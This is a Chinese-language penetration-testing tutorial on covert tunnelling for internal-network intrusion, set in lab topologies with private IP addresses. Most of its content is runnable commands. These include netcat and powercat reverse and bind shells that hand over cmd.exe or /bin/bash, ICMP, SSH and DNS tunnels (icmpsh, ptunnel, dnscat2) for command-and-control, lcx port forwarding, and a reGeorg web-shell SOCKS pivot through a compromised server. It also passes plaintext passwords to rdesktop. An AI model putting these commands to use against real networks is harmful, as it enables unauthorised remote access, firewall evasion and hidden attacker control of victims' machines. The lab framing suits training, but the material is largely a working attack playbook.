关于内网渗透中-隐藏通信技术

概述：

根据OSI网络模型角度分析大致可分为三类：

分类：

网络层：IPv6隧道 ICMP隧道 GRE隧道
传输层：TCP隧道 UDP隧道 常规端口转发
应用层：SSH隧道 HTTP隧道 HTTPS隧道 DNS隧道

 

一、网络层

工具：

IPv6隧道
Socat6 6tunnel nt6tunnel

Icmp 隧道
Icmpsh

 

控制端安装：

apt-get install python-impacket
git clone https://github.com/inquisb/icmpsh.git
cd icmpsh

sudo python icmpsh_m.py 本机监听IP 被攻击机器IP

被攻击机器执行：
icmpsh.exe -t 192.168.1.203 -d 500 -b 30 -s 128

 

 

 

 

数据流量包

 

 

 

 

PingTunnel
http://freshmeat.sourceforge.net/projects/ptunnel/

实验拓扑：

 

 

 

 

 

 

实现效果：

 

 

 

这种攻击场景中很常见，就是攻击主机无法直接访问到数据库服务器，但是可以通过web服务器作为代理来进行访问，具体操作如下：

攻击主机 Linux服务器安装ptunnel工具

Linux服务器上操作：
# ptunnel -x hack405

 

 

攻击主机上操作：
# sudo ptunnel -p 192.168.1.14 -lp 2080 -da 10.10.202.103 -dp 3389 -x hack405

 

 

然后在攻击主机上就可以访问：
rdesktop 192.168.1.203:2080 -u '用户名' -p 密码

 

 

 

 

在Linux服务器上看下网络层的流量

 

 

 

二、传输层隧道技术

Lcx 端口转发
Lcx 是一个基于socket套接字实现的端口转发工具，有window和Linux两个版本，window版本为lcx.exe ，Linux的版本为portmap.
内网端口转发
Lcx.exe -slave public IP address 4444 127.0.0.1 3389

 

 

 

Vps 上执行：
Lcx.exe -listen 4444 5555
将本机上4444端口上的所有数据转发到本机的5555端口上
Mstsc public IPaddress:5555 访问即可连接内网主机的3389端口

 

 

 

另外一种利用场景：

本地端口映射，在渗透测试中，如果内网的主机限制了允许开放的端口，这时候就需要进行端口复用，一般就是复用允许的端口，53 或者80 ，443之类的

lcx.exe -tran 53 192.168.1.13 3389

 

 

 

Netcat 端口转发

使用nc进行端口扫描
Nc -v -z 192.168.1.11 20-1024

Nc 监听
Nc -lvvp 4444

文件传输

目标主机开启监听：
nc -lp 333 > 1.txt

源文件主机开启传输：
sudo nc -vn 192.168.1.14 333 < man.txt -q 1
(UNKNOWN) [192.168.1.14] 333 (?) open

正向shell

Window版本
服务端：
nc.exe -lvp 4444 -e c:\Windows\System32\cmd.exe
listening on [any] 4444 ...
192.168.1.14: inverse host lookup failed: h_errno 11004: NO_DATA
客户端：
Nc -lvp 192.168.1.14 4444

 

 

 

 

Linux 版本
服务端：
Nc -lvp 4444 -e /bin/bash

客户端：
Nc 192.168.1.14 4444

 

 

反向shell

客户端监听：
Nc -lvvp 4444
服务端：
Nc 192.168.1.13 -e c:\Windows\System32\cmd.exe

 

 

 

实验拓扑：

 

 

 

  

环境描述：

攻击者获取了Linux服务器的权限，无法直接访问数据库服务器，但是可以通过Linux服务器来访问数据库服务器，现在要通过内网代理的方式，实现攻击者直接访问数据库服务器

攻击者本机监听：
# sudo nc -lvvp 3333

数据库服务器执行：
# nc.exe-master>nc.exe -lvp 3333 -e c:\Windows\system32\cmd.exe

Linux服务器 边界服务器上执行
# nc -v 192.168.1.203 3333 -c "nc -v 10.10.202.103 3333"

 

 

攻击者服务器上反弹回来数据库服务器的cmd shell

 

 

 

Powercat
power cat是nc的power shell版本，可以通过执行命令回到本地运行，也可以使用远程权限执行

Window上执行：
powercat -l -p 8080 -e cmd.exe -v

 

 

攻击者kail linux
# nc 192.168.1.13 8080 -vv

 

 

 

 

通过nc反向连接powercat

Kail 主机监听：
# nc -lvvp 8088

Window7主机执行：
# PS C:\Users\lisi\Desktop\powercat-master> powercat -c 192.168.1.203 -p 8088 -v -e cmd.exe

 

 

 

通过powercat 返回power shell
这种情况下只能在window操作系统中进行

客户端下载powercat 并开启监听
PS C:\Users\Administrator\Desktop\powercat-master> powercat -l -p 9999 -v

 

 

服务器端执行：
PS C:\Users\lisi\Desktop\powercat-master> powercat -c 192.168.1.11 -p 9999 -v -ep

 

 

 

 

客户端返回powershell

 

 

 

 

Poershellcat DNS 隧道

Kail linux 主机安装
git clone https://github.com/iagox86/dnscat2.git
Cd dnscat2/server
gem install bundler
bundle install
sudo ruby dnscat2.rb pentest.com -e open --no-cache

# powercat -c 192.168.1.203 -p 53 -dns pentest.com -e cmd.exe

 

 

 

 

实验拓扑：

 

 

 

环境描述：

三台主机，其中Windows7 主机可以通过ping 命令访问 Windows server 2008 和kail linux ,kail Linux主机和Windows server 2008 之间无法访问，现在将windows 7 作为跳板，让kail Linux主机可以连接Windows server 2008。

# powercat -l -v -p 9999 -e cmd.exe

 

 

# powercat -l -p 8000 -r tcp:10.10.202.104:9999 -v

 

 

 # sudo nc 192.168.1.13 8000 -vv

 

 

 

三、应用层隧道技术

SSH协议
SSH常见参数说明：
-C：压缩传输，提高传输速度
-f：将SSH传输转入后台执行，不占用当前shell
-N：建立静默连接，建立了连接，但是看不到会话
-g：允许远程主机连接本地用户转发的端口
-L：本地端口转发
-R：远程端口转发
-D：动态端口转发
-p：指定SSH端口

本地端口转发

实验环境：

 

 

 

 

以Linux服务器192.168.1.14为跳板，将内网的数据库服务器10.10.202.102的3389端口映射到VPS的192.168.1.203的1153端口上，再访问VPS的1153端口，就可以访问10.10.202.102的3389端口了。
VPS上执行如下命令：
ssh -CfNg -L 1153（vps端口）：10.10.202.102：（目标端口） root@192.1681.1.13
ssh -CfNg -L 1153:10.10.202.102:3389 root@192.168.1.14

 

 

# rdesktop 192.168.1.203:1153 -u 'hack\lisii' -p 123456

 

 

远程端口转发

 

 

 

左侧为攻击者VPS，右侧是一个小内网，包含二台服务器，内网没有边界，所以外部不能直接访问内网的服务器，内网的Linux服务器可以访问vps和数据库服务器，目标为访问内部的数据库服务器。
以web服务器为跳板机，将VPS的3307端口流量转发到10.10.202.102的3389上，然后访问VPS的3307端口就可以访问10.10.202.102的3389端口了

在WEB服务器上操作
# ssh -CfNg -R 3307:10.10.202.102:3389 gandolf@192.168.1.203
Vps上查看端口：

 

 

连接下试试

# rdesktop 127.0.0.1:3307 -u 'hack\lisi' -p 123456

 

 

动态转发实验拓扑：

 

 

 

实验环境如上，现在目标是攻击者通过本地访问数据库服务器。动态端口映射就是建立一个SSH加密的SOCKS5 SOCK4代理通道

操作如下：
Kail Linux攻击者机器执行：
# ssh -CfNg -D 7000 root@192.168.1.14

 

 

 

设置系统代理访问

 

 

 

 

HTTP/HTTPS 协议
reGeorg 主要功能是把内网服务器端口的数据通过HTTP/HTTPS 隧道转发到本机，实现是基于HTTP协议

实验拓扑：

 

 

 

目标通过端口转发的方式在攻击机器kail linux 上直接访问内网10.10.202.0/24网段的机器

在攻击服务器上下载：https://github.com/sensepost/reGeorg
并将tunnel.nosocket.php 脚本上传到Linux服务器上，然后进行访问验证，是否正常工作

 

 

然后在kail linux 上执行如下命令：
# python reGeorgSocksProxy.py -u http://192.168.1.14/tunnel.nosocket.php -p 9999

 

 

 

gandolf@APT-101:~$ grep "9999" /etc/proxychains.conf 

socks4 127.0.0.1 9999

gandolf@APT-101:~$

 

 

 

DNS协议
Dnscat2
直连模式
中继模式
支持多个会话，流量加密，使用密钥防止中间人攻击，内存中执行power shell脚本，隐蔽性强
操作步骤：
部署域名解析
首先需要一个域名，比如：hack.testlab
A 记录 c2.hack.testlab 指向 192.168.1.11
NS 记录 vpr 指向 c2.hack.testlab

安装dnscat2
# git clone https://github.com/lukebaggett/dnscat2-powershell.git
启动dnscat2
# sudo ruby ./dnscat2.rb vpr.hack.testlab -e open -c password --no-cache

 

 

客户端连接

 

客户端一般推荐使用power shell的dnscat 版本

Import-Module .\dnscat2.ps1
Start-Dnscat2 -Domain vpr.hack.testlab -DNSServer 192.168.1.203

 

 OVER!